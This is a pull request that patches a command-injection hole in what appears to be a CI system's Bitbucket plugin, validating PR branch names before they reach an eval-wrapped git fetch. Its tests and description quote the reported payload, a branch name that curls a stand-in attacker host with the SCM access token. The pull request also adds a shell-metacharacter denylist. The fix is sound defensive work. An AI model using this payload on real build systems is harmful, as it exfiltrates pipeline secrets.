### PR TITLE
fix: validate PR branch names before shell interpolation

### DIFF
--- a/index.js
+++ b/index.js
@@ -53,6 +53,67 @@ function throwError(errorReason, errorCode = 500) {
     throw err;
 }
 
+// Allowlist for branch-like values before they are interpolated into shell
+// command strings. A branch name reaches an `eval`-wrapped `git fetch`, so any
+// value that clears this list must be free of shell-breakout characters.
+// Widen the allowlist deliberately if a real branch name is rejected.
+const allowedChars = [
+    '0-9', // ASCII digits
+    'A-Za-z', // ASCII alphabets
+    '\\p{Script_Extensions=Hiragana}', // Hiragana
+    '\\p{Script_Extensions=Katakana}', // Katakana
+    '\\p{Script_Extensions=Han}', // CJK Han (Kanji)
+    '\\p{Script_Extensions=Hangul}', // Hangul
+    '\\p{Script_Extensions=Greek}', // Greek
+    ',._/#%@\\-+=()', // Filename-safe ASCII symbols allowed by Git
+    '\\u3005', // Ideographic iteration mark: 々
+    '\\u3010', // Left black lenticular bracket: 【
+    '\\u3011', // Right black lenticular bracket: 】
+    '\\uff1a', // Fullwidth colon: ：
+    '\\uff08', // Fullwidth left parenthesis: （
+    '\\uff09', // Fullwidth right parenthesis: ）
+    '\\u3000', // Ideographic space
+    '\\uff10-\\uff19', // Fullwidth digits
+    '\\uff21-\\uff3a', // Fullwidth uppercase letters
+    '\\uff41-\\uff5a' // Fullwidth lowercase letters
+];
+const BRANCH_NAME_ALLOWED_CHAR_RE = new RegExp(`^[${allowedChars.join('')}]+$`, 'u');
+const BRANCH_NAME_DANGEROUS_CHAR_RE = /['"`;!$&<>|]/u;
+
+/**
+ * Detect ASCII control characters (0x00-0x1F, 0x7F).
+ * @param  {String} name branch-like name
+ * @returns {Boolean}    true when control chars are included
+ */
+function hasControlCharacters(name) {
+    for (const char of name) {
+        const codePoint = char.codePointAt(0);
+
+        if (codePoint <= 0x1f || codePoint === 0x7f) {
+            return true;
+        }
+    }
+
+    return false;
+}
+
+/**
+ * Validate branch-like names used in shell command interpolation.
+ * @param  {String} name branch-like name
+ * @returns {Boolean}    true when the name is safe
+ */
+function isSafeBranchName(name) {
+    if (typeof name !== 'string' || name.length === 0) {
+        return false;
+    }
+
+    return (
+        BRANCH_NAME_ALLOWED_CHAR_RE.test(name) &&
+        !hasControlCharacters(name) &&
+        !BRANCH_NAME_DANGEROUS_CHAR_RE.test(name)
+    );
+}
+
 /**
  * Get repo information
  * @method  getRepoInfo
@@ -945,6 +1006,9 @@ class BitbucketScm extends Scm {
         );
 
         if (prReference) {
+            if (!isSafeBranchName(prReference)) {
+                throwError(`Invalid PR branch name: ${prReference}`, 400);
+            }
             const prRef = prReference.replace('merge', 'head:pr');
 
             command.push(

--- a/test/index.test.js
+++ b/test/index.test.js
@@ -1398,6 +1398,65 @@ describe('index', function () {
                 assert.deepEqual(command, testRootDirCommands);
             });
         });
+
+        it('rejects PR branch names containing shell metacharacters', () => {
+            config.prRef = `'"\`;!&$<>|`;
+
+            return scm.getCheckoutCommand(config).then(
+                () => assert.fail('expected getCheckoutCommand to reject'),
+                err => {
+                    assert.match(err.message, /Invalid PR branch name/);
+                    assert.equal(err.statusCode, 400);
+                }
+            );
+        });
+
+        [`'`, '"', '`', ';', '!', '$', '&', '<', '>', '|'].forEach(char => {
+            it(`rejects PR branch names containing shell metacharacter: ${char}`, () => {
+                config.prRef = `branch${char}name`;
+
+                return scm.getCheckoutCommand(config).then(
+                    () => assert.fail('expected getCheckoutCommand to reject'),
+                    err => {
+                        assert.match(err.message, /Invalid PR branch name/);
+                        assert.equal(err.statusCode, 400);
+                    }
+                );
+            });
+        });
+
+        it('rejects the command-substitution payload from the vulnerability report', () => {
+            config.prRef = 'test$(curl attacker.example/exfil?token=$SCM_ACCESS_TOKEN)';
+
+            return scm.getCheckoutCommand(config).then(
+                () => assert.fail('expected getCheckoutCommand to reject'),
+                err => {
+                    assert.match(err.message, /Invalid PR branch name/);
+                    assert.equal(err.statusCode, 400);
+                }
+            );
+        });
+
+        it('rejects PR branch names containing control characters', () => {
+            config.prRef = 'branch\nname';
+
+            return scm.getCheckoutCommand(config).then(
+                () => assert.fail('expected getCheckoutCommand to reject'),
+                err => {
+                    assert.match(err.message, /Invalid PR branch name/);
+                    assert.equal(err.statusCode, 400);
+                }
+            );
+        });
+
+        it('accepts PR branch names with conservatively-safe special characters', () => {
+            config.prRef = 'feature/some_module.v1-rc1';
+
+            return scm.getCheckoutCommand(config).then(command => {
+                assert.isString(command.command);
+                assert.isAbove(command.command.length, 0);
+            });
+        });
     });
 
     describe('stats', () => {


### PR DESCRIPTION
## Summary

**What changed**
- The PR source branch name (`prRef`) is now validated against a strict allowlist before it is interpolated into the checkout shell command; an unsafe name is rejected with a `400` instead of reaching the shell.
- Adds branch-name validation helpers (`isSafeBranchName` + allowlist/dangerous-character/control-character checks) mirroring the sibling `scm-github` plugin.

**Why**
- `prRef` (parsed from a Bitbucket `pullrequest:created` webhook) flowed unescaped into an `eval`-resolving `git fetch origin <prRef>` in `_getCheckoutCommand`. Because Git/Bitbucket permit shell metacharacters in branch names, a crafted branch name allowed command substitution to run in the build container with pipeline secrets present.

## Spec updates
- N/A — no `docs/specs` in this repo.

## Example (before → after)

A PR opened from a branch named:
```
test$(curl attacker.example/exfil?token=$SCM_ACCESS_TOKEN)
```

Before — the name reached the eval-wrapped fetch verbatim:
```
... fi) "git fetch origin test$(curl attacker.example/exfil?token=$SCM_ACCESS_TOKEN)"
```

After — checkout generation rejects it before any shell interpolation:
```
Error: Invalid PR branch name: test$(curl attacker.example/exfil?token=$SCM_ACCESS_TOKEN)   (statusCode 400)
```

Ordinary names (e.g. `feature/some_module.v1-rc1`) are unaffected.

## Test plan
- [x] `npx mocha --grep getCheckoutCommand test/index.test.js` — new rejection/acceptance cases (shell metacharacters, control chars, the report payload) pass
- [x] `npx mocha test/index.test.js` — full suite green (92 passing)
- [x] `eslint index.js test/index.test.js` — 0 errors

## Out of scope
- Validating the `branch` / `parentBranch` values (lower exploitability — derived from pipeline config, not a fork PR author). Recommended fast-follow.
- Lifting the validation helpers into `screwdriver-scm-base` for all SCM plugins.